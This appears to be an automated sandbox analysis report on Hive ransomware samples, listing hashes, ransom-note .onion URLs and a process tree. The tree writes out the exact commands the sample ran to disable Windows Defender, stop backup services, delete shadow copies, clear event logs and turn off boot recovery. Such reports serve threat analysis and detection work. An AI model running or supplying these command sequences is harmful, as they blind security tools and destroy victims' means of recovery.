Overview

Analysis tabs (score out of 10)
Overview                                   10
Static                                      8
211xahcou.exe         windows7-x64         10
211xahcou.exe         windows10-2004-x64   10
hive.exe              windows7-x64         10
hive.exe              windows10-2004-x64   10
sjl8j6ap3.exe         windows7-x64          1
sjl8j6ap3.exe         windows10-2004-x64    1
windows_25...c5.exe   windows7-x64         10
windows_25...c5.exe   windows10-2004-x64   10
zi1ysv64h.exe         windows7-x64         10
zi1ysv64h.exe         windows10-2004-x64   10

Resubmissions
23-12-2022 20:19   221223-y39gvahb28   score 10
23-12-2022 19:54   221223-ymz88scc8w   score 10
23-12-2022 19:42   221223-yerbcsha78   score 10

Analysis
max time kernel: 107s
max time network: 99s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-12-2022 19:42
Behavioral tasks
task         sample                                                                           resource
behavioral1  211xahcou.exe                                                                    win7-20220812-en
behavioral2  211xahcou.exe                                                                    win10v2004-20220901-en
behavioral3  hive.exe                                                                         win7-20221111-en
behavioral4  hive.exe                                                                         win10v2004-20220812-en
behavioral5  sjl8j6ap3.exe                                                                    win7-20220812-en
behavioral6  sjl8j6ap3.exe                                                                    win10v2004-20221111-en
behavioral7  windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe    win7-20221111-en
behavioral8  windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe    win10v2004-20220812-en
behavioral9  zi1ysv64h.exe                                                                    win7-20221111-en
General
Target: 211xahcou.exe
Size: 3.9MB
MD5: 0e4d44dde522c07d09d9e3086cfae803
SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP: 49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Malware Config
Extracted from: C:\n8pw_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Hive
A ransomware written in Golang first seen in June 2021.

Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created (5 entries) | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Modifies security service  2 TTPs  1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe

Clears Windows event logs  1 TTPs  3 IoCs
pid / Process: 4856 wevtutil.exe, 4180 wevtutil.exe, 4936 wevtutil.exe

Deletes shadow copies  2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit  1 TTPs  2 IoCs
pid / Process: 3732 bcdedit.exe, 1192 bcdedit.exe

Reads user/profile data of web browsers  2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory  64 IoCs
The 64 entries, all attributed to 211xahcou.exe, are of two kinds: the ransom note n8pw_HOW_TO_DECRYPT.txt created in application directories under Program Files, and application files whose names carry a long appended suffix ending in .cv2gj opened for modification.
Launches sc.exe  8 IoCs
Sc.exe is a Windows utility to control services on the system.
pid / Process: 4056 sc.exe, 1712 sc.exe, 2444 sc.exe, 4960 sc.exe, 4332 sc.exe, 1008 sc.exe, 4352 sc.exe, 2676 sc.exe

Interacts with shadow copies  2 TTPs  1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid / Process: 2456 vssadmin.exe

Opens file in notepad (likely ransom note)  1 IoCs
pid / Process: 3364 notepad.exe

Runs net.exe

Runs ping.exe  1 TTPs  1 IoCs
pid / Process: 372 PING.EXE

Suspicious behavior: EnumeratesProcesses  6 IoCs
pid / Process: 4432 powershell.exe (2 IoCs), 3504 powershell.exe (2 IoCs), 2796 211xahcou.exe (2 IoCs)

Suspicious use of AdjustPrivilegeToken  64 IoCs
description | pid | Process
Token: SeSecurityPrivilege, SeBackupPrivilege | 4856 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 4180 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 4936 | wevtutil.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3184 | wmic.exe
Token: the same 21 privileges as PID 3184, followed by a second pass of the first 16 (SeIncreaseQuotaPrivilege through SeUndockPrivilege); the listing stops there at the 64-IoC cap | 4708 | wmic.exe
Suspicious use of WriteProcessMemory  64 IoCs
Each write is recorded twice in the raw listing; the pairs are collapsed below, with procid_target in parentheses.
211xahcou.exe (PID 2796) wrote to memory of: 4652 (83), 4632 (86), 116 (89), 1952 (92), 2336 (95), 4680 (98), 2272 (101), 536 (104), 4332 (107), 1008 (109), 4352 (111), 2676 (113), 4056 (115), 1712 (118), 2444 (120), 4960 (122), 2288 (124), 3136 (126), 4624 (128), 4340 (130), 4064 (132), 760 (134), 3668 (136), 4184 (138)
net.exe wrote to memory of its net1.exe child: 4652 -> 4544 (85), 4632 -> 3432 (88), 116 -> 4520 (91), 1952 -> 2248 (94), 2336 -> 4360 (97), 4680 -> 1668 (100), 2272 -> 748 (103), 536 -> 860 (106)
Processes

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe  [PID 2796]
  cmd: "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
  signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

  +- C:\Windows\SYSTEM32\net.exe  [PID 4652]  net.exe stop "SamSs" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 4544]  C:\Windows\system32\net1 stop "SamSs" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 4632]  net.exe stop "SDRSVC" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 3432]  C:\Windows\system32\net1 stop "SDRSVC" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 116]  net.exe stop "SstpSvc" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 4520]  C:\Windows\system32\net1 stop "SstpSvc" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 1952]  net.exe stop "vmicvss" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 2248]  C:\Windows\system32\net1 stop "vmicvss" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 2336]  net.exe stop "VSS" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 4360]  C:\Windows\system32\net1 stop "VSS" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 4680]  net.exe stop "wbengine" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 1668]  C:\Windows\system32\net1 stop "wbengine" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 2272]  net.exe stop "WebClient" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 748]  C:\Windows\system32\net1 stop "WebClient" /y
  +- C:\Windows\SYSTEM32\net.exe  [PID 536]  net.exe stop "UnistoreSvc_1961a" /y
  |    signatures: Suspicious use of WriteProcessMemory
  |    +- C:\Windows\system32\net1.exe  [PID 860]  C:\Windows\system32\net1 stop "UnistoreSvc_1961a" /y
  +- C:\Windows\SYSTEM32\sc.exe  [PID 4332]  sc.exe config "SamSs" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 1008]  sc.exe config "SDRSVC" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 4352]  sc.exe config "SstpSvc" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 2676]  sc.exe config "vmicvss" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 4056]  sc.exe config "VSS" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 1712]  sc.exe config "wbengine" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 2444]  sc.exe config "WebClient" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\sc.exe  [PID 4960]  sc.exe config "UnistoreSvc_1961a" start= disabled
  |    signatures: Launches sc.exe
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2288]  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 3136]  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4624]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4340]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4064]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 760]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  |    signatures: Modifies Windows Defender Real-time Protection settings
  +- C:\Windows\SYSTEM32\reg.exe  [PID 3668]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  |    signatures: Modifies Windows Defender Real-time Protection settings
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4184]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  |    signatures: Modifies Windows Defender Real-time Protection settings
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2816]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  |    signatures: Modifies Windows Defender Real-time Protection settings
  +- C:\Windows\SYSTEM32\reg.exe  [PID 1444]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  |    signatures: Modifies Windows Defender Real-time Protection settings
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2312]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4968]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4024]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 3936]  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4712]  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 5064]  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  +- C:\Windows\SYSTEM32\schtasks.exe  [PID 1752]  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  +- C:\Windows\SYSTEM32\schtasks.exe  [PID 4012]  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  +- C:\Windows\SYSTEM32\schtasks.exe  [PID 1840]  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  +- C:\Windows\SYSTEM32\schtasks.exe  [PID 4468]  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  +- C:\Windows\SYSTEM32\schtasks.exe  [PID 1304]  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  +- C:\Windows\SYSTEM32\reg.exe  [PID 748]  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4288]  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2060]  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4236]  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4416]  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 5072]  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 3576]  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 4188]  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 360]  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 5016]  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2808]  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  |    signatures: Modifies security service
  +- C:\Windows\SYSTEM32\reg.exe  [PID 2332]  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  +- C:\Windows\SYSTEM32\vssadmin.exe  [PID 2456]  vssadmin.exe delete shadows /all /quiet
  |    signatures: Interacts with shadow copies
  +- C:\Windows\SYSTEM32\wevtutil.exe  [PID 4856]  wevtutil.exe cl system
  |    signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  +- C:\Windows\SYSTEM32\wevtutil.exe  [PID 4180]  wevtutil.exe cl security
  |    signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  +- C:\Windows\SYSTEM32\wevtutil.exe  [PID 4936]  wevtutil.exe cl application
  |    signatures: Clears Windows event logs; Suspicious use of AdjustPrivilegeToken
  +- C:\Windows\System32\Wbem\wmic.exe  [PID 3184]  wmic.exe SHADOWCOPY /nointeractive
  |    signatures: Suspicious use of AdjustPrivilegeToken
  +- C:\Windows\System32\Wbem\wmic.exe  [PID 4708]  wmic.exe shadowcopy delete
  |    signatures: Suspicious use of AdjustPrivilegeToken
  +- C:\Windows\SYSTEM32\bcdedit.exe  [PID 3732]  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  |    signatures: Modifies boot configuration data using bcdedit
  +- C:\Windows\SYSTEM32\bcdedit.exe  [PID 1192]  bcdedit.exe /set {default} recoveryenabled no
  |    signatures: Modifies boot configuration data using bcdedit
  +- C:\Windows\SYSTEM32\cmd.exe  [PID 4644]  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  +- C:\Windows\SYSTEM32\cmd.exe  [PID 2264]  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  |    +- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4432]  powershell Set-MpPreference -DisableIOAVProtection $true
  |         signatures: Suspicious behavior: EnumeratesProcesses
  +- C:\Windows\SYSTEM32\cmd.exe  [PID 3484]  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  |    +- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 3504]  powershell Set-MpPreference -DisableRealtimeMonitoring $true
  |         signatures: Suspicious behavior: EnumeratesProcesses
  +- C:\Windows\SYSTEM32\notepad.exe  [PID 3364]  notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
  |    signatures: Opens file in notepad (likely ransom note)
  +- C:\Windows\SYSTEM32\cmd.exe  [PID 4192]  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
       +- C:\Windows\system32\PING.EXE  [PID 372]  ping.exe -n 5 127.0.0.1
            signatures: Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads